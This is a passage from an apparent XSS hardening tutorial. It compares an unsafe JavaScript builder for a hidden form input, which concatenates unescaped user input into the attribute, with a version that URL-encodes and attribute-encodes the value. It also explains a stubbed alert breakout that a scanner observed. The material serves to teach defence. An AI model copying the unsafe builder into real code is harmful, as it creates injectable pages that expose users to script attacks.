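  return '<input type="hidden" name="destination" value="/search?view=' + view +
    '&trackresize=true" />';
}

// Hardened: URL-encode the value when building the URL, then attribute-encode
// the whole URL when emitting it. The two layers protect different parsers.
function destinationInputSafe(view) {
  const url = '/search?view=' + encodeURIComponent(view) + '&trackresize=true';
  return '<input type="hidden" name="destination" value="' + htmlAttr(url) + '" />';
}

console.log(scriptVarUnsafe(COOKIE_PAYLOAD));
console.log(scriptVarSafe(COOKIE_PAYLOAD));
console.log(destinationInputUnsafe(VIEW_PAYLOAD));
console.log(destinationInputSafe(VIEW_PAYLOAD));
```

Running the unsafe script through evaluate() invokes the stubbed alert once and leaves csrfParam as NaN, which is exactly the breakout the scanner observed; the safe version yields the intended string and no alert call. In the attribute case the hardened output contains only the six quote characters of the markup itself, and the "&" separating the query parameters correctly becomes "&amp;".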
